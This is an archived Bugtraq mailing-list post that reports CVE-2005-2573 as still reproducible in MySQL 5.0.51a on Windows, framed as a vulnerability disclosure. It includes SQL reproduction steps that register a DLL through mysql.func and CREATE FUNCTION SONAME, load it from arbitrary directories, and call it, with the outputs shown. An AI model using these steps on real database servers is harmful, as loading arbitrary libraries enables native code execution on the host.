lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20090316131225.3393.qmail@securityfocus.com> Date: 16 Mar 2009 13:12:25 -0000 From: rahimeh.khodadadi@...il.com To: bugtraq@...urityfocus.com Subject: reporting CVE Hello, CVE-2005-2573 is reported for MySQL 4.1.x before 4.1.13 and MySQL 5.0 before 5.0.7. However. I tested this vulnerability in MySQL 5.0.51a on Windows xp sp2, and found this version vulnerable too. According to CVE-2008-4098, that is reported because of an incomplete fix for CVE-2008-4097, i think this vulnerability should be reported again for an incomplete fix. I tested CVE-2005-2573 in MySQL 5.0.51a and windows XP again and found this vulnerability isn't fixed. Here is my done steps for executing this vulnerability. Example: 1) mysql> INSERT INTO mysql.func (name,dl) VALUES ('lib_mysqludf_udf','C:\Program F iles\MySQL\MySQL Server 5.0\lib/lib_mysqludf_udf.dll') ; Query OK, 1 row affected (0.00 sec) 2) mysql> CREATE FUNCTION lib_mysqludf_udf_info -> RETURNS STRING -> SONAME 'lib_mysqludf_udf.dll' -> ; Query OK, 0 rows affected (0.02 sec) 3) mysql> select lib_mysqludf_udf_info(); +--------------------------------+ | lib_mysqludf_udf_info() | +--------------------------------+ | lib_mysqludf_sys version 0.0.2 | +--------------------------------+ 1 row in set (0.00 sec) (Also, Saving the dll file in another directory (i.e. E:\..\..\), gives the same result) mysql> delete from func where name='lib_mysqludf_udf' and dl='C:\Program Files\My SQL\MySQL Server 5.0\lib/lib_mysqludf_udf.dll' ; Query OK, 1 row affected (0.00 sec) mysql> INSERT INTO mysql.func (name,dl) VALUES ('lib_mysqludf_udf','E:\project\l ib_mysqludf_udf\release/lib_mysqludf_udf.dll') ; Query OK, 1 row affected (0.00 sec) mysql> CREATE FUNCTION udf_arg_count -> RETURNS INTEGER -> SONAME 'lib_mysqludf_udf.dll' -> ; Query OK, 0 rows affected (0.00 sec) mysql> select udf_arg_count(1,2,3,4); +------------------------+ | udf_arg_count(1,2,3,4) | +------------------------+ | 4 | +------------------------+ 1 row in set (0.00 sec) Please verify and send your opion about this. I 'm waitting your mail. Regards Rahimeh.Khodadadi Network Security Center of Sharif University of Iran
Powered by blists - more mailing lists